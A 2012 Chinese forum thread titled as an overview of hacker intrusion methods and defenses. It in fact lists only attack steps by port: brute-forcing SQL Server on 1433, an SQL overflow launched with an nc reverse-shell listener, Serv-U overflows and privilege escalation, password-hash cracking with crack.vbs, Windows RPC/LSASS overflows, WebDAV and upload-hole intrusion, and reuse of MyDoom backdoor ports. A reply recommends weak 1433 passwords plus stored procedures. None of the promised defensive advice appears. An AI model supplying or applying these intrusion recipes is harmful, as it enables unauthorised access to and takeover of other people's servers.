找回密码
 注册
【阿里云】2核2G云新老同享 99元/年,续费同价华为云精选云产品特惠做网站就用糖果主机Jtti,新加坡服务器,美国服务器,香港服务器
查看: 333|回复: 1

简述常见黑客入侵方法以及工具防范

[复制链接]
发表于 2012 年 7 月 27 日 22:34:08 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册

×
工欲善其事,必先利其器,本文由yuxinlouge.com/bbs整理简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
  1. 1433端口入侵
  scanport.exe 查有1433的机器
  SQLScanPass.exe 进行字典暴破(字典是关键)
  最后 SQLTools.exe入侵
  对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
  (以上反向的,测试成功)
  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
  2. 4899端口入侵
  用4899过滤器.exe,扫描空口令的机器
  3. 3899的入侵
  对很早的机器,可以试试3389的溢出
  对2000的机器,可以试试字典暴破。
  4. 80入侵
  对sp3以前的机器,可以用webdav入侵;
  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
  可以利用SQL进行注入。(小榕的注入软件)。
  5. serv-u入侵(21端口)
  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
  用real554.exe入侵。
  7. 6129端口
  用DameWare6129.exe入侵。
  8. 系统漏洞
  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
  进行溢出入侵。
  9. 3127等端口
  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
  10. 其他入侵
  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
发表于 2012 年 11 月 19 日 17:40:35 | 显示全部楼层
【腾讯云】2核2G云服务器新老同享 99元/年,续费同价
事实上,最现实的是字典1433弱口令+那几个扩展存储过程。
Jgwy.Com - Free Web Hosting Guide & Directory In China since 2001! Jgwy.Net-Jglt.Net
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|金光论坛

GMT+8, 2024 年 11 月 16 日 18:03 , Processed in 0.021662 second(s), 21 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表